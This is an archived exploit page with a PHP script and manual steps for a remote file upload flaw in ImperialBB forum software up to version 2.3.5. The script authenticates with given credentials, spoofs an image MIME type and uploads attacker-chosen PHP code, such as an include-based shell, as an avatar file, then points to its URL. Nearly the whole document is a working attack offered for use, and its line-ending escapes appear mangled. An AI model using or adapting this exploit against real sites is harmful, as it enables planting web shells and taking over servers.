[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ImperialBB <= 2.3.5 Remote File Upload Exploit
# Published : 2008-07-05
# Author : PHPLizardo
# Previous Title : Kasseler CMS 1.3.0 (LFI/XSS) Multiple Vulnerabilities
# Next Title : fuzzylime cms 3.01 Remote Command Execution Exploit
Title : ImperialBB <= 2.3.5 Remote File Upload Vulnerability
Date : 5th July 2008
Found by : PHPLizardo - http://phplizardo.2gb.fr
Greetz : Gu1ll4um3r0m41n
Howto : 1. Go to your User Control Panel
2. Upload any file you want
3. Tamper the request and change the mime-type to : image/gif
4. There is your file : http://site.com/[forum_path]/images/avatars/uploads/[your_nickname]_[filename].[ext]
<?php
/*
Title : ImperialBB <= 2.3.5 Remote Upload Vulnerability
Date : 5th July 2008
Found by : PHPLizardo
Description : This vulnerability can be used by a attacker to upload a malicious script on the webserver.
Greetz : irc.worldnet.net #carib0u
*/
if(count($argv) == 5)
{
echo "nn";
echo "+---------------------------------------------------------------+rn";
echo "| ImperialBB <= 2.3.5 Remote Upload Vulnerability |rn";
echo "| By PHPLizardo - irc.worldnet.net #carib0u |rn";
echo "| Usage: php exploit.php site.com /path/ user pass |rn";
echo "+---------------------------------------------------------------+rn";
echo "n";
echo "Code to write in the file (ie. <?php include($_GET['inc']); ?>) :rnn";
$code = trim(fgets(STDIN));
$socket = @fsockopen($argv[1], 80, $eno, $estr, 30);
if(!$socket)
{
die("Could not connect to ".$argv[1].". Operation aborted.");
}
$part1 = "POST " . $argv[2] . "profile.php?func=edit HTTP/1.1rn";
$part1 .= "Host: " . $argv[1] . "rn";
$part1 .= "Accept: */*rn";
$part1 .= "Connection: Closern";
$part1 .= "Cookie: UserName=" . $argv[3] . "; Password=" . md5(md5($argv[4])) . "rn";
$part1 .= "Content-Type: multipart/form-data; boundary=---------------------------200831142015814rn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="Email"rnrn";
$part2 .= "test@test.testrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="Email2"rnrn";
$part2 .= "test@test.testrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="OldPass"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="PassWord"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="Pass2"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="signature"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="aim"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="icq"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="msn"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="yahoo"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="Remote_Avatar_URL"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="Upload_Avatar"; filename="funypicture.php"rn";
$part2 .= "Content-Type: image/gifrnrn";
$part2 .= $code."rn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="month"rnrn";
$part2 .= "00rn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="day"rnrn";
$part2 .= "00rn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="year"rnrn";
$part2 .= "0000rn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="website"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="location"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="email_on_pm"rnrn";
$part2 .= "0rn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="OldPass"rnrnrn";
$part2 .= "-----------------------------200831142015814rn";
$part2 .= "Content-Disposition: form-data; name="Submit"rnrn";
$part2 .= "Submitrn";
$part2 .= "-----------------------------200831142015814--rn";
$part1 .= "Content-Length: " . strlen($part2) . "rnrn";
$part1 .= $part2;
fwrite($socket, $part1);
echo "It might have worked, check if your file is online at -> http://" . $argv[1] . $argv[2] . "/images/avatars/uploads/" . $argv[3] . "_funypicture.php";
}
else
{
echo "nn";
echo "+----.-----------------------------------------------------------+rn";
echo "| ImperialBB <= 2.3.5 Remote Upload Vulnerability |rn";
echo "| By PHPLizardo - irc.worldnet.net #carib0u |rn";
echo "| Usage: php exploit.php site.com /path/ user pass |rn";
echo "+---------------------------------------------------------------+rn";
echo "nn";
}
?>
# www.Syue.com [2008-07-05]